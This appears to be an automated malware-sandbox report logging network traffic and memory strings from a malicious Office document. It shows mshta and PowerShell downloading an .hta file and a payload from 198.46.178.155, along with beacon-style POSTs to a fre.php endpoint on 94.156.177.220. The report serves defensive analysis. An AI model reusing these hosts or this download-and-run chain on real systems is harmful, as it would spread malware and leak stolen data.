              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49168 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.22:49173 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49175 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.22:49176 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.155
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899D4AB5 URLDownloadToFileW,5_2_000007FE899D4AB5
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4181773.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pride=grouchy&affect=acoustic&minute=woozy&neuropathologis HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pride=grouchy&affect=acoustic&minute=woozy&neuropathologis HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pride=grouchy&affect=acoustic&minute=woozy&neuropathologis HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pride=grouchy&affect=acoustic&minute=woozy&neuropathologis HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.155Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 198.46.178.155If-Range: "20ca3-62596e8602d48"
              Source: global trafficHTTP traffic detected: GET /422/seethebestthingswithgoodthingsforgetmebackwithbestthings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.155Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Tue, 29 Oct 2024 05:32:14 GMTConnection: Keep-AliveHost: 198.46.178.155If-None-Match: "20ca3-62596e8602d48"
              Source: global trafficHTTP traffic detected: GET /422/SMPRGSSR.txt HTTP/1.1Host: 198.46.178.155Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /422/SMPRGSSR.txt HTTP/1.1Host: 198.46.178.155Connection: Keep-Alive
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: acesso.run
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: unknownHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:13:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 29 Oct 2024 09:14:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: mshta.exe, 00000004.00000002.428001171.0000000003B29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003B29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003B29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424405989.0000000003B29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003B29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472711657.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466349057.00000000003F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/
              Source: powershell.exe, 00000005.00000002.445010616.0000000002312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.483591075.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/seethe
              Source: powershell.exe, 00000011.00000002.483591075.00000000027AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/seethebestthingswithgoodthingsforgetmebackwithbestthings.tIF
              Source: powershell.exe, 00000005.00000002.444794603.0000000000393000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.481080162.000000000046F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/seethebestthingswithgoodthingsforgetmebackwithbestthings.tIF.dll
              Source: powershell.exe, 00000011.00000002.487554199.000000001A7AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/seethebestthingswithgoodthingsforgetmebackwithbestthings.tIFC:
              Source: powershell.exe, 00000005.00000002.445010616.0000000002312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.483591075.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/seethebestthingswithgoodthingsforgetmebackwithbestthings.tIFp
